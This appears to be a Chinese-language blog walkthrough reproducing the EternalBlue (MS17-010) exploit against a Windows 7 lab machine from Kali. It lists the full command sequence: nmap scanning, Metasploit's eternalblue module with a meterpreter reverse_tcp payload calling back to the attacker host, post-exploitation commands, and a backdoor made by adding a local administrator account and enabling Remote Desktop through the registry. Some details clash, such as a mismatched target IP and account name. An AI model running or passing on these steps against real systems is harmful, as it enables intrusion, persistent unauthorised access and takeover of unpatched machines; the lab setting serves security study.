永恒之蓝(ms17-010)漏洞复现

永恒之蓝(ms17-010)漏洞复现

复现环境

  • 靶机Win7 64位(IP:192.168.123.145)
  • 攻击机:kali 64位(IP:192.168.123.5)

复现过程

1.探测靶机端口

使用Nmap对靶机端口服务进行扫描:

1
root@kali:~/桌面# namp -sS -sV -Pn 192.168.123.145

image-20210924220835237

探测到靶机开放445端口,而永恒之蓝利用的就是445端口的smb服务,操作系统溢出漏洞。

2.打开MSF渗透工具

1
root@kali:~/桌面# msfconsole

搜索ms17_010漏洞:

1
search ms17_010

image-20210924220951592

3.使用漏洞模块

1
use exploit/windows/smb/ms17_010_eternalblue

查看漏洞模块信息:info

image-20210924223559269

设置攻击目标:set RHOST 192.168.1.145

image-20210924224112132

查看可用的攻击payload:show payloads

image-20210924223730436

选择并设置攻击Payload:set payload windows/x64/meterpreter/reverse_tcp

image-20210924223951802

设置接收信息的本地设备:set LHOST 192.168.123.5

image-20210924224046547

最后检查下当前的配置:show options

image-20210924232722248

开始攻击:exploit

攻击成功后。

4.持续攻击(种植后门)

1.显示远程主机系统信息:sysinfo

image-20210924232802722

2.查看用户身份:getuid

image-20210924232827116

3.对远程主机当前屏幕进行截图:screenshot

IMgzkcMn

4.获得shell控制台:shell

image-20210924225544138

上面显示转到C:\Windows\system32目录下,说明已经获得了shell的控制权。

5.进行后门植入(创建新的管理员账户)

1
net user hacker 123456 /add     //在windows 7上创建一个hack的用户,以便下次访问
1
net localgroup administrators hack /add   //将hack加入到windows 7的本地管理员组中,以便获得更大权限

可以看到,靶机已经创建了用户

image-20210924225918132

同时可以看到,靶机的445端口一直连接着我们的攻击机

image-20210924230518686

1
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f